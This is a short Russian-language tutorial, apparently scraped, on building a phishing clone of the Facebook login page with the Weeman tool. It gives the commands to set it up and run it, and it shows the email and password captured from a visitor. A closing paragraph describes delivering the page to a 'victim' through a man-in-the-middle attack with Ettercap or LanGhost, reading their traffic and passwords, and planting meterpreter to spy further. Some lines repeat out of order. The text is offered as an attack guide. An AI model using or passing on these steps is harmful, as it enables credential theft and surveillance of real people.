Установка
Сначала надо клонировать Weeman к себе на ПК:
Начнем создание фишинг сайта. Сначала выберем нужный сайт. Например, https://www.facebook.com:
Потом, если кто-то зайдет и введет свои данные, мы увидим примерно такую картину:
Сначала надо клонировать Weeman к себе на ПК:
git clone https://github.com/evait-security/weeman.git
Перейдем в директорию Weeman:cd weeman
И запускаем weeman.py:sudo python2 weeman.py
После запуска видим такую картину:
Начнем создание фишинг сайта. Сначала выберем нужный сайт. Например, https://www.facebook.com:
set url https://www.facebook.com
Выберем порт:set port 8080
И напишем, куда после этого будет направлять пользователя:set action_url https://www.facebook.com
И запуск:run
Потом, если кто-то зайдет и введет свои данные, мы увидим примерно такую картину:
email => simple
pass => simple
Для того, чтобы подложить жертве этот сайт, мы можем воспользоваться приложением вроде Ettercap или LanGhost для совершения атаки посредника. Благодаря этому мы получим возможность перехватывать и анализировать его трафик и даже отправлять собственный трафик в его компьютер. Другими словами, из-за того, что он подключился к нашей точке доступа, мы получили полный контроль над всеми входящим и исходящим данными. Кроме этого, мы сможем перехватывать электронные письма и пароли к другим приложениям и сетям. При желании, мы даже можем внедрить в его систему meterpreter или другое приложение для прослушки, если хотим получить больше информации.
